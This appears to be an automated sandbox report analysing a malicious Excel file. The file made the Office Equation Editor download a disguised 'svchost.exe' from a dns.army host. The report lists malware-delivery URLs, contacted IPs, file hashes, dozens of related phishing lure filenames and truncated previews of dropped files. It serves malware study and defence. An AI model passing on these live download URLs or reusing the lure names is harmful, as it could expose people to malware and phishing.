      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe6%ReversingLabsWin32.Trojan.Generic
      C:\Users\Public\vbc.exe6%ReversingLabsWin32.Trojan.Generic

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://stdyworkfinetraistfh.dns.army/findoc/svchost.exe100%Avira URL Cloudmalware
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      is.gd
      104.25.234.53
      truefalse
        high
        stdyworkfinetraistfh.dns.army
        103.141.138.118
        truetrue
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://stdyworkfinetraistfh.dns.army/findoc/svchost.exetrue
          • Avira URL Cloud: malware
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            172.67.83.132
            unknownUnited States
            13335CLOUDFLARENETUSfalse
            103.141.138.118
            stdyworkfinetraistfh.dns.armyViet Nam
            135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:378980
            Start date:31.03.2021
            Start time:12:03:50
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 12s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:MKDRPSJS9E999494993.xlsx
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:6
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winXLSX@4/25@3/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 5.6% (good quality ratio 2.8%)
            • Quality average: 30.1%
            • Quality standard deviation: 33.2%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xlsx
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/378980/sample/MKDRPSJS9E999494993.xlsx

            Simulations

            Behavior and APIs

            TimeTypeDescription
            12:05:13API Interceptor67x Sleep call for process: EQNEDT32.EXE modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            172.67.83.132xpy9BhQR3t.xlsxGet hashmaliciousBrowse
              VSLS PARTICULARS.xlsxGet hashmaliciousBrowse
                Customer Account Details.docxGet hashmaliciousBrowse
                  New Order.xlsxGet hashmaliciousBrowse
                    COAU7229898130.xlsxGet hashmaliciousBrowse
                      MV Sky Marine.xlsxGet hashmaliciousBrowse
                        Vsl Stowage plan _Particulars.xlsxGet hashmaliciousBrowse
                          LoadingdocMVSORSI.xlsxGet hashmaliciousBrowse
                            LoadingdocMVSORSI.xlsxGet hashmaliciousBrowse
                              Payment_Advice_REF344266.xlsxGet hashmaliciousBrowse
                                New order.xlsxGet hashmaliciousBrowse
                                  310012000016-Proforma invoice.xlsxGet hashmaliciousBrowse
                                    New Order March.xlsxGet hashmaliciousBrowse
                                      Confirm the balance for Quarter 042021.xlsxGet hashmaliciousBrowse
                                        RFQ_MV. VTC PHOENIX.xlsxGet hashmaliciousBrowse
                                          Statement Of Account 2021.xlsxGet hashmaliciousBrowse
                                            Commercial Invoice.xlsxGet hashmaliciousBrowse
                                              payment proof.xlsxGet hashmaliciousBrowse
                                                RFQ_MVVTCPHOENIX.xlsxGet hashmaliciousBrowse
                                                  Invoice.xlsxGet hashmaliciousBrowse
                                                    103.141.138.118Al Rabiah Trade Requirment.xlsxGet hashmaliciousBrowse
                                                    • stdyworkfinetraistfh.dns.army/findoc/svchost.exe
                                                    draft bill VCSC2100266.xlsxGet hashmaliciousBrowse
                                                    • workfinewsdytraistbk.dns.army/findoc/svchost.exe
                                                    New Order March.xlsxGet hashmaliciousBrowse
                                                    • stdyworkfinetraistmg.dns.army/findoc/svchost.exe
                                                    March Order 4th.xlsxGet hashmaliciousBrowse
                                                    • thdyworkfinerainball.dns.army/findoc/svchost.exe?platform=hootsuite
                                                    BC748484HC9484847DCD.xlsxGet hashmaliciousBrowse
                                                    • thdyworkfinerainbows.dns.army/findoc/svchost.exe?platform=hootsuite
                                                    Order 25th Feb.xlsxGet hashmaliciousBrowse
                                                    • thdyworkfinerainbows.dns.army/findoc/svchost.exe?platform=hootsuite
                                                    Tyre Order 24th February.xlsxGet hashmaliciousBrowse
                                                    • thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
                                                    Booking.xlsxGet hashmaliciousBrowse
                                                    • thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
                                                    22-2-2021 .xlsxGet hashmaliciousBrowse
                                                    • thdyworkfinerainbotm.dns.army/findoc/svchost.exe
                                                    17-02 Requirment.xlsxGet hashmaliciousBrowse
                                                    • workfinestdyrainbost.dns.army/findoc/svchost.exe
                                                    New-Order Requirment.xlsxGet hashmaliciousBrowse
                                                    • workfinestdyrainbost.dns.army/findoc/svchost.exe
                                                    Inquiry from Pure fine food Ltd.xlsxGet hashmaliciousBrowse
                                                    • workfinestdyrainbost.dns.army/findoc/svchost.exe
                                                    Debtor_Statement.xlsxGet hashmaliciousBrowse
                                                    • workfinestdyrainbost.dns.army/findoc/svchost.exe
                                                    Order 34.xlsxGet hashmaliciousBrowse
                                                    • wsdyworkfinerainbows.dns.army/receipwt/svchost.exe
                                                    3rd February Order Request.xlsxGet hashmaliciousBrowse
                                                    • workfinestdyrainbost.dns.army/receipwt/svchost.exe
                                                    Order Requirment.xlsxGet hashmaliciousBrowse
                                                    • workfinestdyrainbost.dns.army/receipwt/svchost.exe
                                                    Vietcong Order February.xlsxGet hashmaliciousBrowse
                                                    • workfinestdyrainbost.dns.army/receipwt/svchost.exe
                                                    Tyre List.xlsxGet hashmaliciousBrowse
                                                    • wsdyworkfinerainbows.dns.army/receipwt/svchost.exe
                                                    New -PO January.xlsxGet hashmaliciousBrowse
                                                    • wsdyworkfinesanothws.dns.navy/worksdoc/svchost.exe
                                                    IMG-CMR.xlsxGet hashmaliciousBrowse
                                                    • workfinestdysanothtp.dns.army/worksdoc/svchost.exe

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    stdyworkfinetraistfh.dns.armyAl Rabiah Trade Requirment.xlsxGet hashmaliciousBrowse
                                                    • 103.141.138.118
                                                    is.gd_ShipDoc_CI_PL_HBL_.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    VSLS PARTICULARS.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    Invoice.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    NEW ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    Customer Account Details.docxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    New Order.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    purchase order.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    RFQ 4168.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    invoice bank.xlsxGet hashmaliciousBrowse
                                                    • 104.25.233.53
                                                    New Order.xlsxGet hashmaliciousBrowse
                                                    • 104.25.233.53
                                                    Draft Shipping Documents.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    COAU7229898130.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    MV Sky Marine.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    Al Rabiah Trade Requirment.xlsxGet hashmaliciousBrowse
                                                    • 104.25.233.53
                                                    Vsl Stowage plan _Particulars.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    LoadingdocMVSORSI.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    draft bill VCSC2100266.xlsxGet hashmaliciousBrowse
                                                    • 104.25.233.53

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    CLOUDFLARENETUS_ShipDoc_CI_PL_HBL_.xlsxGet hashmaliciousBrowse
                                                    • 104.25.234.53
                                                    X2W37wTRCN.dllGet hashmaliciousBrowse
                                                    • 104.20.185.68
                                                    Pi_34568723.exeGet hashmaliciousBrowse
                                                    • 104.21.87.185
                                                    ORDER-331.xls.exeGet hashmaliciousBrowse
                                                    • 172.67.145.154
                                                    BL Draft copy.exeGet hashmaliciousBrowse
                                                    • 172.67.207.142
                                                    Lista de nuevos pedidos.exeGet hashmaliciousBrowse
                                                    • 162.159.130.233
                                                    Swift Copy Against due Invoice.PDF.exeGet hashmaliciousBrowse
                                                    • 172.64.207.3
                                                    Shipping doc_.exeGet hashmaliciousBrowse
                                                    • 104.21.87.185
                                                    onbgX3WswF.exeGet hashmaliciousBrowse
                                                    • 23.227.38.74
                                                    Ref150420190619A-B0270PEL. pdf.exeGet hashmaliciousBrowse
                                                    • 172.64.206.3
                                                    PO 2100020608-77003731.exeGet hashmaliciousBrowse
                                                    • 172.67.189.8
                                                    scan-100218.docmGet hashmaliciousBrowse
                                                    • 104.21.71.207
                                                    SecuriteInfo.com.Trojan.DownLoader38.17696.30952.exeGet hashmaliciousBrowse
                                                    • 172.67.145.154
                                                    ORDER_PDF.exeGet hashmaliciousBrowse
                                                    • 23.227.38.74
                                                    UzEdq6cXTa.dllGet hashmaliciousBrowse
                                                    • 104.20.184.68
                                                    TXZiKhMb8J.exeGet hashmaliciousBrowse
                                                    • 172.67.145.154
                                                    8090800.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    g0g865fQ2S.exeGet hashmaliciousBrowse
                                                    • 104.21.65.7
                                                    list.dwg.exeGet hashmaliciousBrowse
                                                    • 23.227.38.74
                                                    xX6hYVpN8T.exeGet hashmaliciousBrowse
                                                    • 172.67.145.154
                                                    VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN_ShipDoc_CI_PL_HBL_.xlsxGet hashmaliciousBrowse
                                                    • 103.99.1.159
                                                    Pago 31 Mar 2021 at 2.15PP3343PDF.jarGet hashmaliciousBrowse
                                                    • 103.133.109.176
                                                    DHL Shipment Notification 0012151100.exeGet hashmaliciousBrowse
                                                    • 103.151.123.132
                                                    DHLMar 2021 at 4.508BZ290PDF.jarGet hashmaliciousBrowse
                                                    • 103.133.109.176
                                                    xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                    • 103.99.1.172
                                                    VSLS PARTICULARS.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.243
                                                    Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                    • 103.99.1.172
                                                    Invoice.xlsxGet hashmaliciousBrowse
                                                    • 103.125.191.187
                                                    DHLMar 2021 at 9.708BZ290PDF.jarGet hashmaliciousBrowse
                                                    • 103.133.109.176
                                                    NEW ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                    • 103.141.138.132
                                                    DHLMar 2021 at 9.108BZ290PDF.jarGet hashmaliciousBrowse
                                                    • 103.133.109.176
                                                    Customer Account Details.docxGet hashmaliciousBrowse
                                                    • 103.125.191.187
                                                    New Order.xlsxGet hashmaliciousBrowse
                                                    • 103.141.138.132
                                                    purchase order.xlsxGet hashmaliciousBrowse
                                                    • 103.99.1.149
                                                    RFQ 4168.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.243
                                                    invoice bank.xlsxGet hashmaliciousBrowse
                                                    • 103.141.138.117
                                                    New Order.xlsxGet hashmaliciousBrowse
                                                    • 103.141.138.132
                                                    INV2102-MDRTCL.xlsxGet hashmaliciousBrowse
                                                    • 103.125.191.69
                                                    Payment Invoice.exeGet hashmaliciousBrowse
                                                    • 103.151.123.132
                                                    ZuCp27hikl.exeGet hashmaliciousBrowse
                                                    • 103.141.136.23

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    36f7277af969a6947a61ae0b815907a1_ShipDoc_CI_PL_HBL_.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    VSLS PARTICULARS.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    PAYMENT ADVICE.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    Original Invoice-COAU7230734290.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    Invoice.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    NEW ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    Customer Account Details.docxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    Payment Proof.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    New Order.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    purchase order.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    RFQ 4168.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    invoice bank.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    New Order.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    uIIHdM0MHt.rtfGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    Draft Shipping Documents.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    COAU7229898130.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    MV Sky Marine.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    Al Rabiah Trade Requirment.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132
                                                    Vsl Stowage plan _Particulars.xlsxGet hashmaliciousBrowse
                                                    • 172.67.83.132

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):73728
                                                    Entropy (8bit):3.8027076963041346
                                                    Encrypted:false
                                                    SSDEEP:768:EltriQ4cyKU+NSpGGLgqHXRmf9l/h97Q:7vh+NSUGLtg9Bo
                                                    MD5:6CC6D1DD6CDD848693426A270563C921
                                                    SHA1:B7D970A91FD89E99C3533C22B14EA7B00258E011
                                                    SHA-256:7D0B3FE8AA36FCFFB72E5A7F03E60D8F1E0A5FC211D223B84D15706C3444D817
                                                    SHA-512:218FAD1CAF9FD03F3EBE1B6E2A5E2F3916EC37C2EDA0A99FFB816B359A7975E95B2F7DF8902BFC25F97D6ED9D532D05CE5CFACCB02E18760A2731C459F913809
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 6%
                                                    Reputation:low
                                                    IE Cache URL:http://stdyworkfinetraistfh.dns.army/findoc/svchost.exe
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...x..P..................... ....................@.......................... ..............................................D...(...........................................................................(... ....................................text............................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8c74Ut[1].htm
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5
                                                    Entropy (8bit):1.5219280948873621
                                                    Encrypted:false
                                                    SSDEEP:3:hn:h
                                                    MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                    SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                    SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                    SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: 0....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\189FF3B9.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
                                                    Category:dropped
                                                    Size (bytes):29499
                                                    Entropy (8bit):7.667442162526095
                                                    Encrypted:false
                                                    SSDEEP:384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
                                                    MD5:4FBDDF16124B6C9368537DF70A238C14
                                                    SHA1:45E34D715128C6954F589910E6D0429370D3E01A
                                                    SHA-256:0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
                                                    SHA-512:EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: ......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D220241.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):79394
                                                    Entropy (8bit):7.864111100215953
                                                    Encrypted:false
                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4DC46D3C.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):51166
                                                    Entropy (8bit):7.767050944061069
                                                    Encrypted:false
                                                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59943EF7.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                    Category:dropped
                                                    Size (bytes):14198
                                                    Entropy (8bit):7.916688725116637
                                                    Encrypted:false
                                                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D141431.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                    Category:dropped
                                                    Size (bytes):8815
                                                    Entropy (8bit):7.944898651451431
                                                    Encrypted:false
                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\609FBB1D.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 94 x 142, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):9691
                                                    Entropy (8bit):7.959193699276328
                                                    Encrypted:false
                                                    SSDEEP:192:62uS2yEGqUUKfpuGBzO8DJFY/tgzqfM9Ey9F1V3lNRDCFvXR9gV:f+E7fnWtUEYbTRgfRmV
                                                    MD5:A8A216BB487BBC4AF6E1B88732A427E6
                                                    SHA1:D45419F3B1B29292B35D1FC6012E610CB92D91F1
                                                    SHA-256:110B0525BA4978477A56719B2617D5D2E51BFA9836856DA596EB049039377AE2
